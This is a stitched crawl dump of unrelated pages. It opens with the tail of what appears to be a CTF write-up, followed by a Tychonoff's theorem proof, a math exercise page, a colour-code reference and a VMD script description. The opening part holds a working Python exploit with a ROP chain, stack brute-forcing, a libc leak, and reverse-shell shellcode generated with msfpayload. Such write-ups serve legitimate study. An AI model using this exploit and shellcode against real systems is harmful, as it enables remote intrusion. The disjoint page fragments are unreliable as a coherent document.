fd\np += pack(\"<I\", area) # void *buf\np += pack(\"<I\", len(SC)) # size_t n\np += pack(\"<I\", 0) # int flags\n\np += pack(\"<I\", area)\n\ns = connect()\ns.send((\"a=new Socket();a.send(a.fileno);a.recv(\"+str(len(p))+\");//\").ljust(1024,\"X\"))\nfileno = unpack(\"<I\", s.recv(4))\np = p.replace(\"FDNO\", pack(\"<I\",fileno))\ns.send(p)\ns.send(SC)\ns.close()\nprint \"Done. Have shell?\"\n\n# Shellcode to use\n# msfpayload linux/x86/shell_reverse_tcp LHOST=\"127.0.0.1\" LPORT=\"1337\" R |hexdump -ve '\"\\\\\\x\" 1/1 \"%02x\"'; echo;\nSC = \"\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x5b\\x5e\\x68\\x7f\\x00\\x00\\x01\\x66\\x68\\x05\\x39\\x66\\x53\\x6a\\x10\\x51\\x50\\x89\\xe1\\x43\\x6a\\x66\\x58\\xcd\\x80\\x59\\x87\\xd9\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"\n\nsebp, seip, context = bf_stack()\nlibc = get_libc_ba()\nprint \"Remote libc at 0x%08x\" % libc\nexploit(SC)```\nThis exploitation also bypasses ASLR, but takes more time because of the brute-force. Anyway I like it because we don't have to make any assumption about remote libraries thanks to the arbitrary memory leak using send(). If remote libraries are unknown, we can find where they are from the GOT then dump and analyze them.\n\nThank you ShmooCon and Ghost in the Shellcode for this cool challenge!\n\n1.", null, "2.", null, "" ]
[ null, "https://resources.blogblog.com/img/blank.gif", null, "https://www.blogger.com/img/blogger_logo_round_35.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.66798866,"math_prob":0.902296,"size":16236,"snap":"2022-27-2022-33","text_gpt3_token_len":5176,"char_repetition_ratio":0.115389355,"word_repetition_ratio":0.11464968,"special_character_ratio":0.35772356,"punctuation_ratio":0.14986038,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96190274,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-27T20:49:19Z\",\"WARC-Record-ID\":\"<urn:uuid:b1711cae-593e-4f94-906c-00631ef5b20c>\",\"Content-Length\":\"164946\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:212c44c9-b772-421b-9980-2e7663ca4bc1>\",\"WARC-Concurrent-To\":\"<urn:uuid:fb16569c-fd2a-4de6-aec1-6929d6e17685>\",\"WARC-IP-Address\":\"142.250.65.83\",\"WARC-Target-URI\":\"https://blog.stalkr.net/2011/01/shmoocon-ctf-warmup-contest-javascrimpd.html?showComment=1294978990935\",\"WARC-Payload-Digest\":\"sha1:LLXZEOOPCC2PTYSO3FCFXUHTGUH4ASYV\",\"WARC-Block-Digest\":\"sha1:7UCHRI2S3UP6WOBUGCO5JZYCJPMDOFUI\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103341778.23_warc_CC-MAIN-20220627195131-20220627225131-00329.warc.gz\"}"}
http://mathonline.wikidot.com/tychonoff-s-theorem-for-arbitrary-products-of-compact-sets
[ "Tychonoff's Theorem for Arbitrary Products of Compact Sets\n\nTychonoff's Theorem for Arbitrary Products of Compact Sets\n\nRecall from the Alexander's Subbasis Theorem page that if $(X, \\tau)$ is a topological space and $\\mathcal S$ is a subbasis of the topology $\\tau$ on $X$ then if every open cover consisting only of subbasis elements has a finite subcover, then $X$ is a compact space.\n\nWe will use this great result to prove the famous Tychonoff's theorem.\n\n Theorem 1 (Tychonoff's Theorem): Let $\\{ X_i \\}_{i \\in I}$ be an arbitrary collection of topological spaces. Then $X_i$ is compact for all $i \\in I$ if and only if the topological product $\\displaystyle{\\prod_{i \\in I} X_i}$ is compact.\n• Proof: $\\Rightarrow$ Suppose that $X_i$ is compact for all $i \\in I$ and consider the product $\\displaystyle{\\prod_{i \\in I} X_i}$. Recall from the Arbitrary Topological Products of Topological Spaces page that a subbasis for this topological product is given by:\n(1)\n\\begin{align} \\quad \\mathcal S = \\left \\{ p_i^{-1}(U) : U \\: \\mathrm{is \\: open \\: in \\:} X_i \\mathrm{\\: for \\: some \\:} i \\in I \\right \\} \\end{align}\n• We claim that any cover of $X$ consisting only of subbasis elements has a finite subcover. Let $\\mathcal F$ be a cover of $X$ consisting only of subbasis elements.\n• For each $i \\in I$ let $\\mathcal U_i$ be the set of all $U$ for which $p_i^{-1}(U) \\in \\mathcal F$, i.e.,:\n(2)\n\\begin{align} \\quad \\mathcal U_i = \\{ U : p_i^{-1}(U) \\in \\mathcal F \\} \\end{align}\n• We claim that there exists an $i \\in I$ such that $\\mathcal U_i$ covers $X_i$. Suppose not, i.e., suppose that for all $i \\in I$ we have that $\\mathcal U_i$ does not cover $X_i$, i.e., $\\displaystyle{X_i \\not \\subseteq \\bigcup_{U \\in \\mathcal U_i} U}$. Then there exists an $x_i \\in X_i$ that is not covered by $\\mathcal U_i$, so $\\displaystyle{x_i \\not \\in \\bigcup_{U \\in \\mathcal U_i} U}$.\n• Let $(x_i)_{i \\in I}$ be the point in $\\displaystyle{\\prod_{i \\in I} X_i}$ constructed from taking coordinates as described above. Then $(x_i)_{i \\in I} \\not \\in p_i^{-1}(U) \\in \\mathcal F$. But this is a contradiction since $\\mathcal F$ is supposed to be a cover of $\\displaystyle{\\prod_{i \\in I} X_i}$. So the assumption that there does not exist an $i \\in I$ such that $\\mathcal U_i$ covers $X_i$ is false.\n• So there exists an $i \\in I$ such that $\\mathcal U_{i}$ covers $X_{i}$. Each space in the product is compact, so $X_{i}$ is compact, so there exists a finite subcover, $U_1, U_2, ..., U_n$ of $\\mathcal U_i$ that also covers $X_i$. But then the following set is a finite subcover of $\\displaystyle{\\prod_{i \\in I} X_i}$:\n(3)\n\\begin{align} \\quad \\{ p_i^{-1}(U_1), p_i^{-1}(U_2), ..., p_i^{-1}(U_n) \\} \\end{align}\n• Moreover, since $U_1, U_2, ..., U_n \\in \\mathcal U_i$, this means that $p_i^{-1}(U_1), p_i^{-1}(U_2), ..., p_i^{-1}(U_n) \\in \\mathcal F$. So every open cover consisting only of elements from the subbasis $\\mathcal S$ has a finite subcover.\n• By Alexander's subbasis theorem, this implies that $\\displaystyle{\\prod_{i \\in I} X_i}$ is a compact space. $\\blacksquare$" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.788448,"math_prob":0.99992454,"size":3072,"snap":"2019-43-2019-47","text_gpt3_token_len":986,"char_repetition_ratio":0.15026076,"word_repetition_ratio":0.11485148,"special_character_ratio":0.33398438,"punctuation_ratio":0.12765957,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000055,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-16T11:36:56Z\",\"WARC-Record-ID\":\"<urn:uuid:de802af4-ae76-4871-86f0-142d7cff3d61>\",\"Content-Length\":\"18855\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:10e88937-1d2e-45ca-baaf-4278d1cc9ea1>\",\"WARC-Concurrent-To\":\"<urn:uuid:fb01e710-4790-42e6-8af4-c0f4b4416061>\",\"WARC-IP-Address\":\"107.20.139.176\",\"WARC-Target-URI\":\"http://mathonline.wikidot.com/tychonoff-s-theorem-for-arbitrary-products-of-compact-sets\",\"WARC-Payload-Digest\":\"sha1:PQID4EYWXJJ2Z7XGZ6RL3TZZCPERFK7G\",\"WARC-Block-Digest\":\"sha1:TTXLGGFFB4D2ON6U4544KV4XWAZYHR5V\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986668569.22_warc_CC-MAIN-20191016113040-20191016140540-00222.warc.gz\"}"}
https://www.hackmath.net/en/example/7573?tag_id=21
[ "# Perfect cubes\n\nSuppose a number is chosen at random from the set (0,1,2,3,. .. ,202).\nWhat is the probability that the number is a perfect cube?\n\nResult\n\np =  2.475 %\n\n#### Solution:", null, "Leave us a comment of example and its solution (i.e. if it is still somewhat unclear...):", null, "Be the first to comment!", null, "#### To solve this example are needed these knowledge from mathematics:\n\nWould you like to compute count of combinations?\n\n## Next similar examples:\n\n1. Word", null, "What is the probability that a random word composed of chars T, H, A, M will be MATH?\n2. Cards", null, "From a set of 32 cards we randomly pull out three cards. What is the probability that it will be seven king and ace?\n3. Boys and girls", null, "There are eight boys and nine girls in the class. There were six children on the trip from this class. What is the probability that left a) only boys b) just two boys\n4. Three-digit numbers", null, "How many three-digit numbers are from the numbers 0 2 4 6 8 (with/without repetition)?\n5. Salami", null, "How many ways can we choose 5 pcs of salami, if we have 6 types of salami for 10 pieces and one type for 4 pieces?\n6. Boys and girls", null, "There are 11 boys and 18 girls in the classroom. Three pupils will answer. What is the probability that two boys will be among them?\n7. Sum or product", null, "What is the probability that two dice fall will have the sum 7 or product 12?\n8. Raffle", null, "There are 200 draws in the raffle, but only 20 of them win. What is the probability of at least 4 winnings for a group of people who have bought 5 tickets together?\n9. Combinations of sweaters", null, "I have 4 sweaters two are white, 1 red and 1 green. How many ways can this done?\n10. Families 2", null, "There are 729 families having 6 children each. The probability of a girl is 1/3 and the probability of a boy is 2/3. Find the the number of families having 2 girls and 4 boys.\n11. A pizza", null, "A pizza place offers 14 different toppings. How many different three topping pizzas can you order?\n12. Word MATEMATIKA", null, "How many words can be created from the word MATEMATIKA by changing the order of the letters, regardless of whether or not the words are meaningful?\n13. Flags", null, "How many different flags can be made from colors white, red, green, purple, orange, yellow, blue so that each flag consisted of three different colors?\n14. Hockey players", null, "After we cycle five hockey players sit down. What is the probability that the two best scorers of this crew will sit next to each other?\n15. Dices throws", null, "What is the probability that the two throws of the dice: a) Six falls even once b) Six will fall at least once\n16. 7 heroes", null, "9 heroes galloping on 9 horses behind. How many ways can sort them behind?\n17. Vans", null, "In how many ways can 9 shuttle vans line up at the airport?" ]
[ null, "https://www.hackmath.net/tex/e7573/57c978dabc.png", null, "https://www.hackmath.net/hashover/images/first-comment.png", null, "https://www.hackmath.net/hashover/images/avatar.png", null, "https://www.hackmath.net/static/t/t_278.jpg", null, "https://www.hackmath.net/static/t/t_4827.jpg", null, "https://www.hackmath.net/static/t/t_7064.jpg", null, "https://www.hackmath.net/static/t/t_1816.jpg", null, "https://www.hackmath.net/static/t/t_4737.jpg", null, "https://www.hackmath.net/static/t/t_7924.jpg", null, "https://www.hackmath.net/static/t/t_5232.jpg", null, "https://www.hackmath.net/static/t/t_5953.jpg", null, "https://www.hackmath.net/static/t/t_2618.jpg", null, "https://www.hackmath.net/static/t/t_7457.jpg", null, "https://www.hackmath.net/static/t/t_7936.jpg", null, "https://www.hackmath.net/static/t/t_5434.jpg", null, "https://www.hackmath.net/static/t/t_208.jpg", null, "https://www.hackmath.net/static/t/t_1320.jpg", null, "https://www.hackmath.net/static/t/t_2560.jpg", null, "https://www.hackmath.net/static/t/t_435.jpg", null, "https://www.hackmath.net/static/t/t_724.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9344803,"math_prob":0.9365584,"size":2660,"snap":"2019-13-2019-22","text_gpt3_token_len":667,"char_repetition_ratio":0.15737952,"word_repetition_ratio":0.06508876,"special_character_ratio":0.24736843,"punctuation_ratio":0.10992908,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9776603,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40],"im_url_duplicate_count":[null,2,null,null,null,null,null,4,null,5,null,2,null,2,null,1,null,null,null,2,null,2,null,1,null,2,null,9,null,1,null,2,null,2,null,4,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-21T08:09:56Z\",\"WARC-Record-ID\":\"<urn:uuid:98f579f8-3494-42cb-959c-9d87cb92432c>\",\"Content-Length\":\"17072\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:52fba069-1f87-484d-8144-657dc6976f02>\",\"WARC-Concurrent-To\":\"<urn:uuid:11eed10a-87ba-4603-89ba-eeef80d20002>\",\"WARC-IP-Address\":\"104.24.105.91\",\"WARC-Target-URI\":\"https://www.hackmath.net/en/example/7573?tag_id=21\",\"WARC-Payload-Digest\":\"sha1:5PJ4KWIUHFAQSWFHMXN4ABXEFROZKKFK\",\"WARC-Block-Digest\":\"sha1:6IOAMRDTG3HR4C2P3SDTIZZQXR7N3AN5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912202506.45_warc_CC-MAIN-20190321072128-20190321094128-00514.warc.gz\"}"}
https://www.colorhexa.com/00703f
[ "# #00703f Color Information\n\nIn a RGB color space, hex #00703f is composed of 0% red, 43.9% green and 24.7% blue. Whereas in a CMYK color space, it is composed of 100% cyan, 0% magenta, 43.8% yellow and 56.1% black. It has a hue angle of 153.8 degrees, a saturation of 100% and a lightness of 22%. #00703f color hex could be obtained by blending #00e07e with #000000. Closest websafe color is: #006633.\n\n• R 0\n• G 44\n• B 25\nRGB color chart\n• C 100\n• M 0\n• Y 44\n• K 56\nCMYK color chart\n\n#00703f color description : Very dark cyan - lime green.\n\n# #00703f Color Conversion\n\nThe hexadecimal color #00703f has RGB values of R:0, G:112, B:63 and CMYK values of C:1, M:0, Y:0.44, K:0.56. Its decimal value is 28735.\n\nHex triplet RGB Decimal 00703f `#00703f` 0, 112, 63 `rgb(0,112,63)` 0, 43.9, 24.7 `rgb(0%,43.9%,24.7%)` 100, 0, 44, 56 153.8°, 100, 22 `hsl(153.8,100%,22%)` 153.8°, 100, 43.9 006633 `#006633`\nCIE-LAB 41.131, -39.803, 19.717 6.691, 11.946, 6.656 0.265, 0.472, 11.946 41.131, 44.419, 153.647 41.131, -36.268, 28.855 34.564, -25.932, 12.778 00000000, 01110000, 00111111\n\n# Color Schemes with #00703f\n\n• #00703f\n``#00703f` `rgb(0,112,63)``\n• #700031\n``#700031` `rgb(112,0,49)``\nComplementary Color\n• #007007\n``#007007` `rgb(0,112,7)``\n• #00703f\n``#00703f` `rgb(0,112,63)``\n• #006970\n``#006970` `rgb(0,105,112)``\nAnalogous Color\n• #700700\n``#700700` `rgb(112,7,0)``\n• #00703f\n``#00703f` `rgb(0,112,63)``\n• #700069\n``#700069` `rgb(112,0,105)``\nSplit Complementary Color\n• #703f00\n``#703f00` `rgb(112,63,0)``\n• #00703f\n``#00703f` `rgb(0,112,63)``\n• #3f0070\n``#3f0070` `rgb(63,0,112)``\n• #317000\n``#317000` `rgb(49,112,0)``\n• #00703f\n``#00703f` `rgb(0,112,63)``\n• #3f0070\n``#3f0070` `rgb(63,0,112)``\n• #700031\n``#700031` `rgb(112,0,49)``\n• #002414\n``#002414` `rgb(0,36,20)``\n• #003d22\n``#003d22` `rgb(0,61,34)``\n• #005731\n``#005731` `rgb(0,87,49)``\n• #00703f\n``#00703f` `rgb(0,112,63)``\n• #008a4d\n``#008a4d` `rgb(0,138,77)``\n• #00a35c\n``#00a35c` `rgb(0,163,92)``\n• #00bd6a\n``#00bd6a` `rgb(0,189,106)``\nMonochromatic Color\n\n# Alternatives to #00703f\n\nBelow, you can see some colors close to #00703f. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #007023\n``#007023` `rgb(0,112,35)``\n• #00702c\n``#00702c` `rgb(0,112,44)``\n• #007036\n``#007036` `rgb(0,112,54)``\n• #00703f\n``#00703f` `rgb(0,112,63)``\n• #007048\n``#007048` `rgb(0,112,72)``\n• #007052\n``#007052` `rgb(0,112,82)``\n• #00705b\n``#00705b` `rgb(0,112,91)``\nSimilar Colors\n\n# #00703f Preview\n\nThis text has a font color of #00703f.\n\n``<span style=\"color:#00703f;\">Text here</span>``\n#00703f background color\n\nThis paragraph has a background color of #00703f.\n\n``<p style=\"background-color:#00703f;\">Content here</p>``\n#00703f border color\n\nThis element has a border color of #00703f.\n\n``<div style=\"border:1px solid #00703f;\">Content here</div>``\nCSS codes\n``.text {color:#00703f;}``\n``.background {background-color:#00703f;}``\n``.border {border:1px solid #00703f;}``\n\n# Shades and Tints of #00703f\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #000e08 is the darkest color, while #f9fffd is the lightest one.\n\n• #000e08\n``#000e08` `rgb(0,14,8)``\n• #002213\n``#002213` `rgb(0,34,19)``\n• #00351e\n``#00351e` `rgb(0,53,30)``\n• #004929\n``#004929` `rgb(0,73,41)``\n• #005c34\n``#005c34` `rgb(0,92,52)``\n• #00703f\n``#00703f` `rgb(0,112,63)``\n• #00844a\n``#00844a` `rgb(0,132,74)``\n• #009755\n``#009755` `rgb(0,151,85)``\n• #00ab60\n``#00ab60` `rgb(0,171,96)``\n• #00be6b\n``#00be6b` `rgb(0,190,107)``\n• #00d276\n``#00d276` `rgb(0,210,118)``\n• #00e681\n``#00e681` `rgb(0,230,129)``\n• #00f98c\n``#00f98c` `rgb(0,249,140)``\n• #0eff96\n``#0eff96` `rgb(14,255,150)``\n• #22ff9e\n``#22ff9e` `rgb(34,255,158)``\n• #35ffa7\n``#35ffa7` `rgb(53,255,167)``\n• #49ffaf\n``#49ffaf` `rgb(73,255,175)``\n• #5cffb8\n``#5cffb8` `rgb(92,255,184)``\n• #70ffc0\n``#70ffc0` `rgb(112,255,192)``\n• #84ffc9\n``#84ffc9` `rgb(132,255,201)``\n• #97ffd2\n``#97ffd2` `rgb(151,255,210)``\n• #abffda\n``#abffda` `rgb(171,255,218)``\n• #beffe3\n``#beffe3` `rgb(190,255,227)``\n• #d2ffeb\n``#d2ffeb` `rgb(210,255,235)``\n• #e6fff4\n``#e6fff4` `rgb(230,255,244)``\n• #f9fffd\n``#f9fffd` `rgb(249,255,253)``\nTint Color Variation\n\n# Tones of #00703f\n\nA tone is produced by adding gray to any pure hue. In this case, #343c39 is the less saturated color, while #00703f is the most saturated one.\n\n• #343c39\n``#343c39` `rgb(52,60,57)``\n• #2f4139\n``#2f4139` `rgb(47,65,57)``\n• #2b453a\n``#2b453a` `rgb(43,69,58)``\n• #27493a\n``#27493a` `rgb(39,73,58)``\n• #224e3b\n``#224e3b` `rgb(34,78,59)``\n• #1e523b\n``#1e523b` `rgb(30,82,59)``\n• #1a563c\n``#1a563c` `rgb(26,86,60)``\n• #165a3c\n``#165a3c` `rgb(22,90,60)``\n• #115f3d\n``#115f3d` `rgb(17,95,61)``\n• #0d633d\n``#0d633d` `rgb(13,99,61)``\n• #09673e\n``#09673e` `rgb(9,103,62)``\n• #046c3e\n``#046c3e` `rgb(4,108,62)``\n• #00703f\n``#00703f` `rgb(0,112,63)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #00703f is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5060716,"math_prob":0.85746646,"size":3661,"snap":"2023-14-2023-23","text_gpt3_token_len":1624,"char_repetition_ratio":0.13781789,"word_repetition_ratio":0.007352941,"special_character_ratio":0.5583174,"punctuation_ratio":0.23015873,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9939393,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-05-31T22:59:17Z\",\"WARC-Record-ID\":\"<urn:uuid:32ada7b2-b6cc-4b94-9e0a-31117a61c6cf>\",\"Content-Length\":\"36092\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:af637845-6189-4495-ac9c-f03399baf99e>\",\"WARC-Concurrent-To\":\"<urn:uuid:ab93cb70-ffc5-481e-a148-b143cb61505b>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/00703f\",\"WARC-Payload-Digest\":\"sha1:AHNQWM4RVZ5AITWFYUFNN2BFLZGXYHA4\",\"WARC-Block-Digest\":\"sha1:PKSNQPZZGWS25Q7OAOBTNOHF5LAZPPX5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224647459.8_warc_CC-MAIN-20230531214247-20230601004247-00006.warc.gz\"}"}
https://studysoup.com/tsg/20266/university-physics-13-edition-chapter-15-problem-47e
[ "×\nGet Full Access to University Physics - 13 Edition - Chapter 15 - Problem 47e\nGet Full Access to University Physics - 13 Edition - Chapter 15 - Problem 47e\n\n×\n\n# The portion of the string of a certain musical instrument", null, "ISBN: 9780321675460 31\n\n## Solution for problem 47E Chapter 15\n\nUniversity Physics | 13th Edition\n\n• Textbook Solutions\n• 2901 Step-by-step solutions solved by professors and subject experts\n• Get 24/7 help from StudySoup virtual teaching assistants", null, "University Physics | 13th Edition\n\n4 5 1 241 Reviews\n13\n2\nProblem 47E\n\nThe portion of the string of a certain musical instrument between the bridge and upper end of the finger board (that part of the string that is free to vibrate) is 60.0 cm long, and this length of the string has mass 2.00 g. The string sounds an A4 note (440 Hz) when played. (a) Where must the player put a finger (what distance x from the bridge) to play a D 5 note (587 Hz)? (See ?Fig. E15.45?.) For both the A4 and D5 notes, the string vibrates in its fundamental mode. (b) Without retuning, is it possible to play a G4 note (392 Hz) on this string? Why or why not?\n\nStep-by-Step Solution:\n\nSolution 47E Introduction The length of the string to produce the A4 note is given, we have to calculate the required length to produce the D5 note. Step 1 Let us consider that the speed of the wave in the string is v . Now the frequency of A4 node is f = 440 Hz and the frequency of the D5 note is f = 587 Hz. 1 2 Now let us consider that the wavelength of the A4 and D5 notes are and1 . Henc2 the speed is given by v = f 1 1 f 2 2.(1) Now, the length of the string for L =160 cm and the length of the string for D5 note is L . We2 also know that, for the fundamental note, the wavelength is given by 1 2L a1d = 22 2 Hence from the equation (1) we can write that 2L f = 2L f 1 1L f 2(440 Hz)(60 cm) L 2 f 1= (587 Hz) 45.0 Hz 2 So the player must put the finger at 45.0 cm away.\n\nStep 2 of 2\n\n##### ISBN: 9780321675460\n\nSince the solution to 47E from 15 chapter was answered, more than 814 students have viewed the full step-by-step answer. This textbook survival guide was created for the textbook: University Physics, edition: 13. University Physics was written by and is associated to the ISBN: 9780321675460. The answer to “The portion of the string of a certain musical instrument between the bridge and upper end of the finger board (that part of the string that is free to vibrate) is 60.0 cm long, and this length of the string has mass 2.00 g. The string sounds an A4 note (440 Hz) when played. (a) Where must the player put a finger (what distance x from the bridge) to play a D 5 note (587 Hz)? (See ?Fig. E15.45?.) For both the A4 and D5 notes, the string vibrates in its fundamental mode. (b) Without retuning, is it possible to play a G4 note (392 Hz) on this string? Why or why not?” is broken down into a number of easy to follow steps, and 113 words. The full step-by-step solution to problem: 47E from chapter: 15 was answered by , our top Physics solution expert on 05/06/17, 06:07PM. This full solution covers the following key subjects: string, Note, Play, bridge, finger. This expansive textbook survival guide covers 26 chapters, and 2929 solutions.\n\nUnlock Textbook Solution" ]
[ null, "https://studysoup.com/cdn/85cover_2610067", null, "https://studysoup.com/cdn/85cover_2610067", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.906634,"math_prob":0.842757,"size":1348,"snap":"2021-43-2021-49","text_gpt3_token_len":404,"char_repetition_ratio":0.1748512,"word_repetition_ratio":0.013840831,"special_character_ratio":0.32344213,"punctuation_ratio":0.09006211,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9738568,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-11-29T23:31:51Z\",\"WARC-Record-ID\":\"<urn:uuid:915498d3-9025-4fcf-a669-c3b2253a6595>\",\"Content-Length\":\"85332\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a8998c08-ceba-4cf8-a6bd-c83a6af11f3e>\",\"WARC-Concurrent-To\":\"<urn:uuid:90f3b9ec-445e-4759-978b-1a73d49d7040>\",\"WARC-IP-Address\":\"54.189.254.180\",\"WARC-Target-URI\":\"https://studysoup.com/tsg/20266/university-physics-13-edition-chapter-15-problem-47e\",\"WARC-Payload-Digest\":\"sha1:LQAXSVNE6W5A6XLI7PTIOJP5L3IELZXF\",\"WARC-Block-Digest\":\"sha1:EI75UCEJJQ6SLTCGSJZJP3KHQKEXBVDR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964358847.80_warc_CC-MAIN-20211129225145-20211130015145-00334.warc.gz\"}"}
https://www.ks.uiuc.edu/Research/vmd/script_library/scripts/ca-dist-v2.0/
[ "```CA Distance Plot 2.0\n--------------------\n\nREQUIREMENTS: VMD Version 1.5 or newer\n\nDESCRIPTION:\nGiven a selection, this script finds the CA atoms and constructs a\nmatrix whose elements are the distances from the CA of residue(i) to\nthat on residue(j). A new graphics molecule is created with the name\n\"CA_distance(molid)\", where molid is the index of the molecule used\nby the selection. The distance matrix is plotted by residue number\nin the order they appeared in the PDB (or PSF, ...) file, but only\nthe selected residues are shown. The colors are determined by the\ncolor scale and may be changed accordingly.\n\nHOW IT WORKS:\nThis example creates a distance matrix made of the distance\nbetween the CAs of two residues. The only input value is selection\nused to find the CAs. The distances are stored in the 2D array\n`dist', which is indexed by the atom indices of the CAs (remember,\natom indices start at 0).\n\nThe distance matrix is a new graphics molecule. It consists\nof two triangles for each element of the matrix (to make up a square).\nThe color for each pair is one of the 32 elements in the color scale\nand is determined so the range of distance values fits linearly\nbetween 34 and 66 (excluding 66 itself). The name of the graphics is\n`CA_distance(n)' where `n' is the molecule id of the selection\nused to create the matrix.\n\nThe first graphics command, ``materials off'' is to keep the\nlights from reflecting off the matrix (otherwise there is too much\nglare). At the end, the corners of the matrix are labeled in yellow\nwith the resid values of the CAs.\n\nOne extra procedure, ``vecdist'', is used. This computes\nthe difference between two vectors of length 3. It is not as general\nas the normal method (vecnorm [vecsub \\$v1 \\$v2]) but is almost\ntwice as fast, which speeds up the overall subroutine by almost 10%.\nThe script is not very fast; after all, for a 234 residue protein,\n27495 distance calculations are made and 54756*2 triangles generated.\nNearly all of that is done in Tcl. In terms of times, about 1/3 is\nspent in the distance calculations, another 1/3 in the math to make\nthe triangles, and another 1/3 in the three `graphics' calls. The\nresidue 234 example protein took 70 seconds to do everything on an\nSGI Crimson.\n\nPROCEDURES:\nca_dist selection -- makes a new graphics molecule which is\nthe CA-CA distance plot of the given selection\n\nEXAMPLE OUTPUT:", null, "image of bacteriorhodopsin with the CA-CA on the bottom" ]
[ null, "https://www.ks.uiuc.edu/Research/vmd/script_library/scripts/ca-dist-v2.0/br.dist.small.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9249944,"math_prob":0.9798168,"size":2508,"snap":"2019-26-2019-30","text_gpt3_token_len":576,"char_repetition_ratio":0.15335463,"word_repetition_ratio":0.0,"special_character_ratio":0.2400319,"punctuation_ratio":0.10080645,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97631675,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-22T18:19:17Z\",\"WARC-Record-ID\":\"<urn:uuid:5004d5a6-2f66-4e46-91d8-a6362ec95f56>\",\"Content-Length\":\"3243\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3fcf8dec-6ff2-4cb2-8ebd-51e93362ee47>\",\"WARC-Concurrent-To\":\"<urn:uuid:60fbde0f-b2e9-4577-ba4f-1dd014a93ee1>\",\"WARC-IP-Address\":\"130.126.120.35\",\"WARC-Target-URI\":\"https://www.ks.uiuc.edu/Research/vmd/script_library/scripts/ca-dist-v2.0/\",\"WARC-Payload-Digest\":\"sha1:C22OJAUDLROU5ALZ2P7EHTCUA4GZUMK2\",\"WARC-Block-Digest\":\"sha1:TRHIS62NOIZITI6ZGEHAUYYBJX2LXUA4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195528208.76_warc_CC-MAIN-20190722180254-20190722202254-00426.warc.gz\"}"}
https://gitlab.common-lisp.net/gpalter/ansi-test/commit/2f8353ca0fd1b428cc32758854ebfe65fca26d47
